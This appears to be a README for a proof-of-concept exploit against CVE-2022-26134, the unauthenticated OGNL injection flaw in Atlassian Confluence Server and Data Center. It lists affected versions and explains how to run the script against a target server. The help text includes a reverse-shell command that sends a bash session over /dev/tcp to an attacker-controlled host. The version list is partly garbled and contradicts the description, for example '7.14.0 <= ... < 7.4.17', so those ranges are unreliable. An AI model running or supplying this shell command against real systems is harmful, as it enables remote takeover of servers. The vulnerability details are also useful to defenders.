CVE-2022-26134 PoC — Atlassian Confluence Server Injection Vulnerability

Associated Vulnerability
Title: Atlassian Confluence Server injection vulnerability (CVE-2022-26134)
Description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Description
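A remote, unauthenticated attacker can construct an OGNL expression and inject it into Confluence, executing arbitrary code on Confluence Server or Data Center. The PoC was modified from an existing script to make getting a shell easier.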
Readme

# CVE-2022-26134
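A remote, unauthenticated attacker can construct and inject an OGNL expression to execute arbitrary code on Confluence Server or Data Center. The PoC has been modified to make getting a shell easier. Common port: 8090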

## Affected versions
* Confluence Server and Data Center >= 1.3.0
* 7.14.0 <= Confluence Server and Data Center < 7.4.17
* 7.13.0 <= Confluence Server and Data Center < 7.13.7
* 7.14.0 <= Confluence Server and Data Center < 7.14.3
* 7.15.0 <= Confluence Server and Data Center < 7.15.2
* 7.16.0 <= Confluence Server and Data Center < 7.16.4
* 7.17.0 <= Confluence Server and Data Center < 7.17.4
* 7.18.0 <= Confluence Server and Data Center < 7.18.1

## Usage instructions
```
pip3 install requests
```

```shell
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1
```
## Usage
```shell
python3 CVE-2022-26134.py -t [server ip] -c [command]  # execute command
```

This script is for testing purposes only; do not use it for anything else.